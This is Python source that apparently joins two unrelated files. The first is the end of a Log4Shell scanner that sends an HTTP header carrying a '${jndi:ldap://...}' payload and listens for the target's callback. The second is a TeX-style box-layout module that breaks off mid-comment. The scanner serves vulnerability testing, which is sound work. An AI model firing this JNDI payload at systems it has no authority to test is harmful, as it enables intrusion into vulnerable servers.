    if not g_debug:
        return
    suffix = "\n" if extraLineFeed else ""
    print("%s [DEBUG] %s%s" % (DATETIME_STRING(), msg, suffix), file = file)
#------------------------------------------------------------------------------
def quote(s):
    """
    Wrap *s* in double quotes if it contains a space.

    Quotes are only added on the side(s) not already quoted, so an
    already-quoted string passes through unchanged.  Strings without a
    space are returned as-is.  (The original also tested len(s) > 0 inside
    the space check, which is redundant: a string containing " " is
    necessarily non-empty.)
    """
    if " " in s:
        if not s.startswith("\""):
            s = "\"" + s
        if not s.endswith("\""):
            s = s + "\""
    return s
#------------------------------------------------------------------------------
def printStatus(action, file = sys.stderr, **kwargs):
    """
    Print a timestamped status line plus one aligned "key value" line per
    keyword argument, followed by a blank line.  Suppressed entirely when
    the global result-only mode is active.
    """
    if g_resultOnly:
        return
    print("%s %s" % (DATETIME_STRING(), action), file = file)
    for key, value in kwargs.items():
        print("%-30s %s" % (key, str(value)), file = file)
    print("", file = file)
#------------------------------------------------------------------------------
def errorexit(msg):
    """
    Print *msg* to stderr and terminate with RETVAL_TEST_FAILED.

    Uses sys.exit() instead of the builtin exit(): the builtin is provided
    by the site module for interactive use and is not guaranteed to exist
    in all execution environments.
    """
    print(msg, file = sys.stderr)
    sys.exit(RETVAL_TEST_FAILED)
#------------------------------------------------------------------------------
def signalHandler(signum, frame):
    """SIGINT/SIGTERM handler: cancel the listener thread and flag app exit."""
    global g_evtAppExit
    debug("signalHandler: Caught Signal %d..." % signum)
    thread = g_tcpThread
    if thread is not None:
        thread.cancel()
    event = g_evtAppExit
    if event is not None:
        event.set()
#------------------------------------------------------------------------------
def setLogging(logEnabled = None, logRequestsLib = None):
    """
    Configure debug logging.

    logEnabled     -- when not None, stored into the global g_debug; the
                      root logger level is also set to DEBUG.
                      NOTE(review): the level is forced to DEBUG even when
                      logEnabled is False -- preserved as-is, confirm intent.
    logRequestsLib -- when not None, attach (True) or detach (False) a
                      stderr StreamHandler on the "urllib3" logger so the
                      requests library's wire traffic becomes visible.

    Returns True when the urllib3 handler change was applied, else False.

    The original wrapped the handler logic in ``try/except: raise`` (a
    no-op handler) followed by an unreachable ``ret = False``; both are
    removed.  The ``ret = True`` duplicated across every branch is hoisted.
    """
    global g_debug
    global g_requestLogger
    ret = False
    if(logEnabled is not None):
        g_debug = logEnabled
        logging.getLogger().setLevel(logging.DEBUG)
    if(logRequestsLib is not None):
        rLog = logging.getLogger("urllib3")
        if(rLog is not None):
            if(logRequestsLib):
                if(g_requestLogger is None):
                    g_requestLogger = logging.StreamHandler(sys.stderr)
                    rLog.addHandler(g_requestLogger)
                    rLog.setLevel(logging.DEBUG)
                    #rLog.propagate = False
            elif(g_requestLogger is not None):
                rLog.removeHandler(g_requestLogger)
                g_requestLogger = None
            ret = True
    return(ret)
#------------------------------------------------------------------------------
def exploitCBTestWarning():
    """Print a warning that the callback reachability pre-test was skipped
    (-T / --skip-callback-test), so a negative result may be invalid."""
    print("""
WARNING! WARNING! WARNING! Skip Callback Test Specified!
 * The Callback Test validates the return path to this test script!
 * If the Callback IP / Port is UNREACHABLE, RESULTS MAY BE INVALID!
 * [Morty certainly hopes you know what the heck you're doing!]
    """)
#------------------------------------------------------------------------------
def proxyWarning():
    """Print a warning that a system proxy was detected but deliberately
    bypassed (the -x / --use-system-proxy option was not given)."""
    print("""
WARNING! WARNING! WARNING! System Proxy Set but NOT USED!
 * A system proxy was detected, but the script is OVERRIDING IT!
 * This can be overriden via the (-x or --use-system-proxy) option.
 * Sending the Exploit Request via Proxy IS PERFECTLY VALID, but, of course,
   can be troublesome for testing INTERNAL SYSTEMS.
    """)
#------------------------------------------------------------------------------
def exploitCBTest(exploitCBIP, exploitCBPort):
    """
    Return True if a TCP connection to (exploitCBIP, exploitCBPort)
    succeeds, False otherwise.

    The original leaked the socket when connect() raised (close() was only
    reached on success); the context manager guarantees the descriptor is
    released on every path.  The bare ``except`` is narrowed to OSError,
    which covers socket.error / gaierror / timeout.
    """
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.connect((exploitCBIP, exploitCBPort))
        return True
    except OSError:
        return False
#------------------------------------------------------------------------------
def sendExploitedRequest(
        url,
        exploitHeaderName = "X-Api-Version",
        exploitCBIP = None,
        exploitCBPort = 1389,
        exploitCBUserData = None,
        useProxy = False,
        requestTimeout = 8.0,
        noExploit = False):
    """
    Send one HTTP(S) GET to *url*, optionally carrying the JNDI exploit
    payload in the *exploitHeaderName* header.

    When *url* has no scheme, "http" then "https" are tried until one
    request completes.  Returns a dict with keys:
      succeeded -- True when a response (any status) was received
      status    -- HTTP status code, or -1 when no response
      error     -- stringified exception on failure, else ""
    """
    try:
        urllib3.disable_warnings()
    except:
        pass
    proxies = (PROXY_NONE if(not(useProxy)) else urllib.request.getproxies())
    # ${jndi:ldap://${LDAP_HOST}:${LDAP_PORT}/${LDAP_USERDATA}}
    ret = {
        "succeeded" : False,
        "status" : -1,
        "error" : "",
    }
    headers = {
        "User-Agent" : USER_AGENT,
    }
    if(not(noExploit)):
        headers[exploitHeaderName] = ("${jndi:ldap://%s:%d/%s}" % (
            exploitCBIP,
            exploitCBPort,
            exploitCBUserData))
    if("://" in url):
        # FIX: split on the FIRST "://" only.  The unbounded split made the
        # 2-tuple unpack raise ValueError for any URL whose path itself
        # contains "://".
        (p, u) = url.split("://", 1)
        protos = [p]
        url = u
    else:
        protos = ["http", "https"]
    for proto in protos:
        try:
            session = requests.Session()
            # trust_env controls whether requests honors system proxy vars.
            session.trust_env = useProxy
            response = session.get(
                ("%s://%s" % (proto, url)),
                verify = False,
                headers = headers,
                proxies = proxies,
                timeout = requestTimeout)
            ret["succeeded"] = True
            ret["status"] = response.status_code
            break
        except Exception as e:
            ret["succeeded"] = False
            ret["error"] = str(e)
            if(WANT_EXCEPTIONS): raise
    return(ret)
#------------------------------------------------------------------------------
def isSystemProxyEnabled():
    """
    Detect whether the OS/environment has any proxy configured.

    Returns True/False on success, or None when detection itself failed.
    """
    try:
        detected = urllib.request.getproxies() not in ({}, PROXY_NONE)
    except:
        detected = None
    debug("isSystemProxyEnabled: %s" % (
        "[DETECTION_FAILED]" if detected is None else str(detected)))
    return detected
#------------------------------------------------------------------------------
def main():
    """
    Entry point: parse options, run the connectivity / callback / exploit
    tests against the target url, and return one of the RETVAL_* codes
    documented in usage().
    """
    ## Globals Modified in Function
    global g_tcpThread
    global g_resultOnly
    ## Status Variables
    retval = RETVAL_TEST_FAILED
    cbOk = None
    cbTestSkipped = False
    proxyEnabled = False
    exploitSucceeded = False
    httpTestSucceeded = False
    ## Option Initialization
    exploitOnly = False
    exploitHeaderName = HEADER_NAME_EXPLOIT
    exploitCBIP = TCPThread.getPrimaryIP()
    exploitCBPort = PORT_EXPLOIT_CB_DEF
    exploitCBUserData = None
    exploitCBTimeout = TIMEOUT_EXPLOIT_CB
    useProxy = False
    disableWarnings = False
    skipHTTPTest = False
    ## Option Processing BEGIN ------------------------------------------
    for sig in [signal.SIGINT, signal.SIGTERM]:
        try:
            signal.signal(sig, signalHandler)
        except:
            print("WARNING: Failed to trap Signal %d" % (sig), file = sys.stderr)
    try:
        # FIX: "t:" was missing from the short-option string and
        # "timeout-callback=" from the long-option list, so the
        # -t / --timeout-callback handler below was unreachable (getopt
        # rejected the option before it was ever dispatched).
        # NOTE(review): usage() advertises the long form as "--timeout",
        # but the handler matches "--timeout-callback" -- confirm which
        # spelling is intended.
        opts, args = getopt.getopt(sys.argv[1:], "hdveH:i:p:rt:TxW", \
            [
                "help",
                "debug",
                "debug-verbose",
                "ip-callback=",
                "port-callback=",
                "exploit-only",
                "header=",
                "result-only",
                "timeout-callback=",
                "skip-callback-test",
                "use-system-proxy",
                "disable-warnings",
                "skip-http-test",
            ])
    except getopt.GetoptError as err:
        _ = err # Reserved for Future Use!
        usage()
    for o, a in opts:
        if o in ("-h", "--help"):
            usage()
        elif(o in ("-d", "--debug")):
            # NOTE(review): passes the *current* value of g_debug back in
            # rather than True; preserved as-is -- confirm intent.
            setLogging(g_debug)
        elif(o in ("-v", "--debug-verbose")):
            setLogging(g_debug, logRequestsLib = True)
        elif(o in ("-e", "--exploit-only")):
            exploitOnly = True
        elif(o in ("-H", "--header")):
            exploitHeaderName = a
        elif(o in ("-i", "--ip-callback")):
            exploitCBIP = a
        elif(o in ("-p", "--port-callback")):
            if(len(a) > 0):
                if(a.lower()[0] == "a"):
                    # "a" (auto): let the TCP listener pick a free port.
                    exploitCBPort = None
                else:
                    try:
                        exploitCBPort = int(a)
                    except ValueError:
                        errorexit("Invalid Port Value: %s" % (a))
        elif(o in ("-r", "--result-only")):
            g_resultOnly = True
        elif(o in ("-t", "--timeout-callback")):
            try:
                exploitCBTimeout = int(a)
            except ValueError:
                errorexit("Invalid Callback Timeout Value: %s" % (a))
        elif(o in ("-T", "--skip-callback-test")):
            cbOk = True
            cbTestSkipped = True
        elif(o in ("-x", "--use-system-proxy")):
            useProxy = True
        elif(o in ("-W", "--disable-warnings")):
            disableWarnings = True
        elif(o in ("--skip-http-test")):
            skipHTTPTest = True
        else:
            usage()
    if(len(args) < 1):
        usage()
    url = args[0]
    ## Option Processing END ------------------------------------------
    ## Test Setup BEGIN ------------------------------------------
    if(not(useProxy)):
        proxyEnabled = isSystemProxyEnabled()
        if(proxyEnabled is None):
            # Detection failure is treated the same as "no proxy".
            pass
    if(not(skipHTTPTest)):
        printStatus(
            "Sending HTTP Request WITHOUT EXPLOIT for Connectivity Test",
            url = url)
        reqStatus = sendExploitedRequest(
            url,
            useProxy = useProxy,
            noExploit = True)
        printStatus(
            "Exploit HTTP Request Sent",
            url = url,
            succeeded = str(reqStatus["succeeded"]),
            http_status = str(reqStatus["status"]),
            error = reqStatus["error"])
        if((not(reqStatus.get("succeeded", False))) or
            (reqStatus.get("status", -1) < 0)):
            errorexit("Failed to Send Test HTTP Request (RESULTS WILL BE INVALID); Exiting!")
        else:
            httpTestSucceeded = True
    if(exploitCBUserData is None):
        # Random marker the exploited host will echo back, letting the
        # listener distinguish a real callback from stray connections.
        exploitCBUserData = ("".join(random.choice(string.ascii_lowercase)
            for i in range(LEN_RAND_DATA)))
        debug("Random User Data String [len = %2d]: %s" %
            (len(exploitCBUserData), exploitCBUserData))
    if(not(exploitOnly)):
        try:
            g_tcpThread = TCPThread(
                timeout = exploitCBTimeout,
                searchString = exploitCBUserData,
                port = exploitCBPort)
            exploitCBPort = g_tcpThread.begin()
            g_tcpThread.flushDebugQueue()
            if(exploitCBPort is None):
                errorexit("Failed to bind local listener port; Fatal Error...")
            printStatus(
                "Local Callback Listener Opened",
                port = str(exploitCBPort))
        except Exception as e:
            errorexit("Failed to start TCP Thread: %s; Exiting..." %
                (str(e)))
    ## Test Setup END ------------------------------------------
    ## Test Validation BEGIN ------------------------------------------
    if(not(cbOk)):
        printStatus("Validating Callback IP / Port reachability...")
        cbOk = exploitCBTest(exploitCBIP, exploitCBPort)
        printStatus("Callback IP / Port reachability Test",
            exploitCBIP = exploitCBIP,
            exploitCBPort = exploitCBPort,
            status = ("SUCCEEDED" if(cbOk) else "FAILED"))
        if(not(cbOk)):
            TCPThread.waitForThread(g_tcpThread, cancel = True)
            errorexit("Callback IP / Port Reachability Test FAILED; " +
                "Fatal Error...")
    ## Test Validation END ------------------------------------------
    ## Exploit Test BEGIN ------------------------------------------
    if(g_tcpThread is not None): g_tcpThread.flushDebugQueue()
    printStatus(
        "Sending Exploit HTTP Request",
        url = url)
    reqStatus = sendExploitedRequest(
        url,
        exploitHeaderName = exploitHeaderName,
        exploitCBIP = exploitCBIP,
        exploitCBPort = exploitCBPort,
        exploitCBUserData = exploitCBUserData,
        useProxy = useProxy)
    if(g_tcpThread is not None): g_tcpThread.flushDebugQueue()
    printStatus(
        "Exploit HTTP Request Sent",
        url = url,
        succeeded = str(reqStatus["succeeded"]),
        http_status = str(reqStatus["status"]),
        error = reqStatus["error"])
    if((reqStatus.get("succeeded", False)) and
        (reqStatus.get("status", -1) > -1)):
        if(not(exploitOnly)):
            printStatus(
                "Wait for Exploited Host Callback",
                callbackIP = exploitCBIP,
                callbackPort = exploitCBPort,
                callbackTimeout = exploitCBTimeout)
            try:
                exploitSucceeded = TCPThread.waitForThread(g_tcpThread)
                retval = (RETVAL_VULNERABLE if(exploitSucceeded)
                    else RETVAL_NOT_VULNERABLE)
            except InterruptedError:
                pass
            if(not(g_evtAppExit.is_set())):
                print("%-40s [%s]" % (
                    url,
                    ("VULNERABLE" if(exploitSucceeded) else "not_vulnerable")))
            else:
                print("%-40s [%s]" % (
                    url,
                    "NO_RESULT_USER_CANCELLED"))
    else:
        if(g_tcpThread):
            TCPThread.waitForThread(g_tcpThread, cancel = True)
        if(httpTestSucceeded):
            # Plain request worked but the exploit request failed: the
            # server rejected the JNDI payload => report PATCHED.
            exploitSucceeded = False
            retval = RETVAL_PATCHED
            print("%-40s [%s]" % (
                url,
                "PATCHED"))
        else:
            print("%-40s [%s]" % (
                url,
                "TEST_FAILED"))
    if(not(disableWarnings) and not(exploitSucceeded)):
        if(cbTestSkipped): exploitCBTestWarning()
        if(proxyEnabled): proxyWarning()
    ## Exploit Test END ------------------------------------------
    return(retval)
#------------------------------------------------------------------------------
if(__name__ == "__main__"):
    # Script entry point: exit status is main()'s RETVAL_* code.
    try:
        sys.exit(main())
    except KeyboardInterrupt:
        # Ctrl-C during the run: exit quietly (implicit status 0).
        pass
#------------------------------------------------------------------------------
#------------------------------------------------------------------------------
# svgplotlib/TEX/Model.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
# TeX-LIKE BOX MODEL
# The following is based directly on the document 'woven' from the
# TeX82 source code. This information is also available in printed
# form:
#
# Knuth, Donald E. 1986. Computers and Typesetting, Volume B:
# TeX: The Program. Addison-Wesley Professional.
#
# The most relevant "chapters" are:
# Data structures for boxes and their friends
# Shipping pages out (Ship class)
# Packaging (hpack and vpack)
# Data structures for math mode
# Subroutines for math mode
# Typesetting math formulas
#
# Many of the docstrings below refer to a numbered "node" in that
# book, e.g. node123
#
# Note that (as TeX) y increases downward, unlike many other parts of
# matplotlib.
import math
# Layout constants for the TeX-style box/glue model defined below.
# How much text shrinks when going to the next-smallest level. GROW_FACTOR
# must be the inverse of SHRINK_FACTOR.
SHRINK_FACTOR = 0.7
GROW_FACTOR = 1.0 / SHRINK_FACTOR
# The number of different sizes of chars to use, beyond which they will not
# get any smaller
NUM_SIZE_LEVELS = 6
# Percentage of x-height of additional horiz. space after sub/superscripts
SCRIPT_SPACE = 0.2
# Percentage of x-height that sub/superscripts drop below the baseline
SUBDROP = 0.3
# Percentage of x-height that superscripts drop below the baseline
SUP1 = 0.5
# Percentage of x-height that subscripts drop below the baseline
SUB1 = 0.0
# Percentage of x-height that superscripts are offset relative to the subscript
DELTA = 0.18
class MathTextWarning(Warning):
    """Warning category used for layout problems (over/underfull boxes,
    see List._set_glue)."""
    pass
class Node:
    """
    Base class for every node in the TeX box model.

    `size` counts how many shrink levels have been applied (grow()
    decrements it); subclasses scale their dimensions accordingly.
    """
    def __init__(self):
        self.size = 0

    def __repr__(self):
        return self.__class__.__name__

    def get_kerning(self, next):
        # No kerning by default; Char overrides this.
        return 0.

    def shrink(self):
        """Go one size level smaller (subclasses stop scaling after
        NUM_SIZE_LEVELS)."""
        self.size = self.size + 1

    def grow(self):
        """Go one size level larger; there is no upper limit."""
        self.size = self.size - 1

    def render(self, renderer, x, y):
        # Base nodes produce no output.
        pass
class Box(Node):
    """
    A node with a physical extent: width, height (above the baseline)
    and depth (below the baseline).
    """
    def __init__(self, width, height, depth):
        Node.__init__(self)
        self.width = width
        self.height = height
        self.depth = depth

    def shrink(self):
        Node.shrink(self)
        # Dimensions stop shrinking once the smallest size level is reached.
        if self.size < NUM_SIZE_LEVELS:
            for attr in ("width", "height", "depth"):
                setattr(self, attr, getattr(self, attr) * SHRINK_FACTOR)

    def grow(self):
        Node.grow(self)
        for attr in ("width", "height", "depth"):
            setattr(self, attr, getattr(self, attr) * GROW_FACTOR)

    def render(self, renderer, x1, y1, x2, y2):
        # Plain boxes draw nothing; Rule overrides this.
        pass
class Vbox(Box):
    """
    A box with only height (zero width).
    """
    def __init__(self, height, depth):
        # Width is fixed at zero; only the vertical extent matters.
        Box.__init__(self, 0., height, depth)
class Hbox(Box):
    """
    A box with only width (zero height and depth).
    """
    def __init__(self, width):
        # Height and depth are fixed at zero; only the width matters.
        Box.__init__(self, width, 0., 0.)
class Char(Node):
    """
    Represents a single character. Unlike TeX, the font information
    and metrics are stored with each :class:`Char` to make it easier
    to lookup the font metrics when needed. Note that TeX boxes have
    a width, height, and depth, unlike Type1 and Truetype which use a
    full bounding box and an advance in the x-direction. The metrics
    must be converted to the TeX way, and the advance (if different
    from width) must be converted into a :class:`Kern` node when the
    :class:`Char` is added to its parent :class:`Hlist`.
    """
    def __init__(self, c, state):
        Node.__init__(self)
        self.c = c
        self.font_output = state.font_output
        # `unicode` is the Python 2 text type -- this module targets
        # Python 2 (it is referenced again in Glue.__init__).
        assert isinstance(state.font, (str, unicode, int))
        self.font = state.font
        self.font_class = state.font_class
        self.fontsize = state.fontsize
        self.dpi = state.dpi
        # The real width, height and depth will be set during the
        # pack phase, after we know the real fontsize
        self._update_metrics()
    def __repr__(self):
        return '`%s`' % self.c
    def _update_metrics(self):
        # Cache metrics so is_slanted()/get_kerning() can reuse them.
        metrics = self._metrics = self.font_output.get_metrics(
            self.font, self.font_class, self.c, self.fontsize, self.dpi)
        if self.c == ' ':
            # A space has no ink; its advance is used as the width.
            self.width = metrics.advance
        else:
            self.width = metrics.width
        self.height = metrics.iceberg
        self.depth = -(metrics.iceberg - metrics.height)
    def is_slanted(self):
        # True for italic/oblique glyphs (per the font metrics).
        return self._metrics.slanted
    def get_kerning(self, next):
        """
        Return the amount of kerning between this and the given
        character. Called when characters are strung together into
        :class:`Hlist` to create :class:`Kern` nodes.
        """
        # The advance-vs-width difference is folded into the kern.
        advance = self._metrics.advance - self.width
        kern = 0.
        if isinstance(next, Char):
            kern = self.font_output.get_kern(
                self.font, self.font_class, self.c, self.fontsize,
                next.font, next.font_class, next.c, next.fontsize,
                self.dpi)
        return advance + kern
    def render(self, renderer, x, y):
        """
        Render the character to the canvas
        """
        font = self.font_output
        info = font.get_info(self.font, self.font_class, self.c, self.fontsize, self.dpi)
        # Record which glyph numbers were used for this font (presumably
        # for font subsetting on output -- confirm in the font backend).
        used_characters = font.used_characters.setdefault(self.font, (self.font, set()))
        used_characters[1].add(info.num)
        renderer.render_glyph(x, y, info)
    def shrink(self):
        Node.shrink(self)
        if self.size < NUM_SIZE_LEVELS:
            self.fontsize *= SHRINK_FACTOR
            self.width *= SHRINK_FACTOR
            self.height *= SHRINK_FACTOR
            self.depth *= SHRINK_FACTOR
    def grow(self):
        Node.grow(self)
        self.fontsize *= GROW_FACTOR
        self.width *= GROW_FACTOR
        self.height *= GROW_FACTOR
        self.depth *= GROW_FACTOR
class Accent(Char):
    """
    The font metrics need to be dealt with differently for accents,
    since they are already offset correctly from the baseline in
    TrueType fonts.
    """
    def _update_metrics(self):
        metrics = self._metrics = self.font_output.get_metrics(
            self.font, self.font_class, self.c, self.fontsize, self.dpi)
        # Accents use the glyph bounding box rather than the typographic
        # iceberg/advance metrics used by Char._update_metrics.
        self.width = metrics.xmax - metrics.xmin
        self.height = metrics.ymax - metrics.ymin
        self.depth = 0
    def shrink(self):
        # Re-derive the bbox metrics after the fontsize change.
        Char.shrink(self)
        self._update_metrics()
    def grow(self):
        Char.grow(self)
        self._update_metrics()
    def render(self, renderer, x, y):
        """
        Render the character to the canvas.
        """
        # NOTE(review): this passes (x, y, font, font_class, c, fontsize,
        # dpi) to render_glyph, while Char.render passes (x, y, info) --
        # the two call signatures look inconsistent; confirm against the
        # renderer implementation.
        renderer.render_glyph(
            x - self._metrics.xmin, y + self._metrics.ymin,
            self.font, self.font_class, self.c, self.fontsize, self.dpi)
class List(Box):
    """
    A list of nodes (either horizontal or vertical).
    """
    def __init__(self, elements):
        Box.__init__(self, 0., 0., 0.)
        self.shift_amount = 0.   # An arbitrary offset
        self.children = elements # The child nodes of this list
        # The following parameters are set in the vpack and hpack functions
        self.glue_set = 0.       # The glue setting of this list
        self.glue_sign = 0       # 0: normal, -1: shrinking, 1: stretching
        self.glue_order = 0      # The order of infinity (0 - 3) for the glue
    def __repr__(self):
        return '[%s <%.02f %.02f %.02f %.02f> %s]' % (
            self.__class__.__name__,
            self.width, self.height,
            self.depth, self.shift_amount,
            ' '.join([repr(x) for x in self.children]))
    def _determine_order(self, totals):
        """
        A helper function to determine the highest order of glue
        used by the members of this list. Used by vpack and hpack.
        """
        o = 0
        for i in range(len(totals) - 1, 0, -1):
            if totals[i] != 0.0:
                o = i
                break
        return o
    def _set_glue(self, x, sign, totals, error_type):
        """Distribute the excess/deficit *x* over the list's glue; warn
        when only order-0 (finite) glue is available to absorb it."""
        o = self._determine_order(totals)
        self.glue_order = o
        self.glue_sign = sign
        if totals[o] != 0.:
            self.glue_set = x / totals[o]
        else:
            self.glue_sign = 0
            self.glue_ratio = 0.
        if o == 0:
            if len(self.children):
                # FIX: `warn` was referenced but never imported -- the
                # module imports only `math`, so this line raised NameError
                # instead of emitting a MathTextWarning.  Imported locally
                # to keep this edit self-contained.
                from warnings import warn
                warn("%s %s: %r" % (error_type, self.__class__.__name__, self),
                     MathTextWarning)
    def shrink(self):
        for child in self.children:
            child.shrink()
        Box.shrink(self)
        if self.size < NUM_SIZE_LEVELS:
            self.shift_amount *= SHRINK_FACTOR
            self.glue_set *= SHRINK_FACTOR
    def grow(self):
        for child in self.children:
            child.grow()
        Box.grow(self)
        self.shift_amount *= GROW_FACTOR
        self.glue_set *= GROW_FACTOR
class Hlist(List):
    """
    A horizontal list of boxes.
    """
    def __init__(self, elements, w=0., m='additional', do_kern=True):
        # NOTE(review): `w` and `m` are accepted but never forwarded --
        # hpack() is always called with its defaults.  Confirm intent.
        List.__init__(self, elements)
        if do_kern:
            self.kern()
        self.hpack()
    def kern(self):
        """
        Insert :class:`Kern` nodes between :class:`Char` nodes to set
        kerning. The :class:`Char` nodes themselves determine the
        amount of kerning they need (in :meth:`~Char.get_kerning`),
        and this function just creates the linked list in the correct
        way.
        """
        new_children = []
        num_children = len(self.children)
        if num_children:
            for i in range(num_children):
                elem = self.children[i]
                # Each element is kerned against its successor (None for
                # the last element).
                if i < num_children - 1:
                    next = self.children[i + 1]
                else:
                    next = None
                new_children.append(elem)
                kerning_distance = elem.get_kerning(next)
                if kerning_distance != 0.:
                    kern = Kern(kerning_distance)
                    new_children.append(kern)
        self.children = new_children
    def hpack(self, w=0., m='additional'):
        """
        The main duty of :meth:`hpack` is to compute the dimensions of
        the resulting boxes, and to adjust the glue if one of those
        dimensions is pre-specified. The computed sizes normally
        enclose all of the material inside the new box; but some items
        may stick out if negative glue is used, if the box is
        overfull, or if a ``\\vbox`` includes other boxes that have
        been shifted left.
        - *w*: specifies a width
        - *m*: is either 'exactly' or 'additional'.
        Thus, ``hpack(w, 'exactly')`` produces a box whose width is
        exactly *w*, while ``hpack(w, 'additional')`` yields a box
        whose width is the natural width plus *w*. The default values
        produce a box with the natural width.
        """
        # I don't know why these get reset in TeX. Shift_amount is pretty
        # much useless if we do.
        #self.shift_amount = 0.
        h = 0.  # running max height above the baseline
        d = 0.  # running max depth below the baseline
        x = 0.  # accumulated natural width
        total_stretch = [0.] * 4
        total_shrink = [0.] * 4
        for p in self.children:
            if isinstance(p, Char):
                x += p.width
                h = max(h, p.height)
                d = max(d, p.depth)
            elif isinstance(p, Box):
                x += p.width
                # Infinite ("running") dimensions don't contribute.
                if not math.isinf(p.height) and not math.isinf(p.depth):
                    s = getattr(p, 'shift_amount', 0.)
                    h = max(h, p.height - s)
                    d = max(d, p.depth + s)
            elif isinstance(p, Glue):
                glue_spec = p.glue_spec
                x += glue_spec.width
                total_stretch[glue_spec.stretch_order] += glue_spec.stretch
                total_shrink[glue_spec.shrink_order] += glue_spec.shrink
            elif isinstance(p, Kern):
                x += p.width
        self.height = h
        self.depth = d
        if m == 'additional':
            w += x
        self.width = w
        # x becomes the excess (+) / deficit (-) to absorb with glue.
        x = w - x
        if x == 0.:
            self.glue_sign = 0
            self.glue_order = 0
            self.glue_ratio = 0.
            return
        if x > 0.:
            self._set_glue(x, 1, total_stretch, "Overfull")
        else:
            self._set_glue(x, -1, total_shrink, "Underfull")
class Vlist(List):
    """
    A vertical list of boxes.
    """
    def __init__(self, elements, h=0., m='additional'):
        # NOTE(review): `h` and `m` are accepted but never forwarded --
        # vpack() is always called with its defaults.  Confirm intent.
        List.__init__(self, elements)
        self.vpack()
    def vpack(self, h=0., m='additional', l=float('inf')):
        """
        The main duty of :meth:`vpack` is to compute the dimensions of
        the resulting boxes, and to adjust the glue if one of those
        dimensions is pre-specified.
        - *h*: specifies a height
        - *m*: is either 'exactly' or 'additional'.
        - *l*: a maximum depth; the final depth is capped at *l* and any
          excess is folded into the height computation instead.
        Thus, ``vpack(h, 'exactly')`` produces a box whose height is
        exactly *h*, while ``vpack(h, 'additional')`` yields a box
        whose height is the natural height plus *h*. The default
        values produce a box with the natural width.
        """
        # I don't know why these get reset in TeX. Shift_amount is pretty
        # much useless if we do.
        # self.shift_amount = 0.
        w = 0.  # running max width
        d = 0.  # depth of the most recent box (becomes the list's depth)
        x = 0.  # accumulated natural height
        total_stretch = [0.] * 4
        total_shrink = [0.] * 4
        for p in self.children:
            if isinstance(p, Box):
                # The previous box's depth becomes inter-box distance.
                x += d + p.height
                d = p.depth
                if not math.isinf(p.width):
                    s = getattr(p, 'shift_amount', 0.)
                    w = max(w, p.width + s)
            elif isinstance(p, Glue):
                x += d
                d = 0.
                glue_spec = p.glue_spec
                x += glue_spec.width
                total_stretch[glue_spec.stretch_order] += glue_spec.stretch
                total_shrink[glue_spec.shrink_order] += glue_spec.shrink
            elif isinstance(p, Kern):
                x += d + p.width
                d = 0.
            elif isinstance(p, Char):
                raise RuntimeError("Internal mathtext error: Char node found in Vlist.")
        self.width = w
        if d > l:
            # Depth exceeds the cap: move the excess into the height.
            x += d - l
            self.depth = l
        else:
            self.depth = d
        if m == 'additional':
            h += x
        self.height = h
        # x becomes the excess (+) / deficit (-) to absorb with glue.
        x = h - x
        if x == 0:
            self.glue_sign = 0
            self.glue_order = 0
            self.glue_ratio = 0.
            return
        if x > 0.:
            self._set_glue(x, 1, total_stretch, "Overfull")
        else:
            self._set_glue(x, -1, total_shrink, "Underfull")
class Rule(Box):
    """
    A :class:`Rule` node stands for a solid black rectangle; it has
    *width*, *depth*, and *height* fields just as in an
    :class:`Hlist`. However, if any of these dimensions is inf, the
    actual value will be determined by running the rule up to the
    boundary of the innermost enclosing box. This is called a "running
    dimension." The width is never running in an :class:`Hlist`; the
    height and depth are never running in a :class:`Vlist`.
    """
    def __init__(self, width, height, depth, state):
        Box.__init__(self, width, height, depth)
        self.font_output = state.font_output
    def render(self, renderer, x, y, w, h):
        # A rule is rendered as a filled rectangle by the backend.
        renderer.render_rect_filled(x, y, x + w, y + h)
class Hrule(Rule):
    """
    Convenience class to create a horizontal rule (running width,
    vertically centered on the baseline, *thickness* tall in total).
    """
    def __init__(self, state, thickness=None):
        if thickness is None:
            # FIX: pass state.font first, matching the 3-argument
            # get_underline_thickness(font, fontsize, dpi) call made by
            # Vrule below -- the original omitted the font argument here.
            thickness = state.font_output.get_underline_thickness(
                state.font, state.fontsize, state.dpi)
        height = depth = thickness * 0.5
        Rule.__init__(self, float('inf'), height, depth, state)
class Vrule(Rule):
    """
    Convenience class to create a vertical rule (fixed width equal to the
    underline thickness, running height and depth).
    """
    def __init__(self, state):
        thickness = state.font_output.get_underline_thickness(
            state.font, state.fontsize, state.dpi)
        Rule.__init__(self, thickness, float('inf'), float('inf'), state)
class Glue(Node):
    """
    Most of the information in this object is stored in the underlying
    :class:`GlueSpec` class, which is shared between multiple glue objects. (This
    is a memory optimization which probably doesn't matter anymore, but it's
    easier to stick to what TeX does.)
    """
    def __init__(self, glue_type, copy=False):
        Node.__init__(self)
        self.glue_subtype = 'normal'
        # `unicode` is the Python 2 text type (this module targets py2).
        if isinstance(glue_type, (str, unicode)):
            glue_spec = GlueSpec.factory(glue_type)
        elif isinstance(glue_type, GlueSpec):
            glue_spec = glue_type
        else:
            # FIX: the original raised `ArgumentError`, which is not a
            # defined name anywhere in this module and would itself fail
            # with NameError; ValueError is the appropriate builtin.
            raise ValueError("glue_type must be a glue spec name or instance.")
        if copy:
            glue_spec = glue_spec.copy()
        self.glue_spec = glue_spec
    def shrink(self):
        Node.shrink(self)
        if self.size < NUM_SIZE_LEVELS:
            if self.glue_spec.width != 0.:
                # Specs are shared; copy-on-write before mutating.
                self.glue_spec = self.glue_spec.copy()
                self.glue_spec.width *= SHRINK_FACTOR
    def grow(self):
        Node.grow(self)
        if self.glue_spec.width != 0.:
            # Specs are shared; copy-on-write before mutating.
            self.glue_spec = self.glue_spec.copy()
            self.glue_spec.width *= GROW_FACTOR
class GlueSpec(object):
    """
    Shared specification backing :class:`Glue` (see there): a fixed width
    plus stretch/shrink amounts with their orders of infinity.
    """
    def __init__(self, width=0., stretch=0., stretch_order=0, shrink=0., shrink_order=0):
        self.width = width
        self.stretch = stretch
        self.stretch_order = stretch_order
        self.shrink = shrink
        self.shrink_order = shrink_order

    def copy(self):
        """Return an independent spec with identical field values."""
        return GlueSpec(
            width=self.width,
            stretch=self.stretch,
            stretch_order=self.stretch_order,
            shrink=self.shrink,
            shrink_order=self.shrink_order)

    @classmethod
    def factory(cls, glue_type):
        """Look up the canonical shared spec for a named glue type."""
        return cls._types[glue_type]

# Canonical named specs.  These instances are shared, so callers must
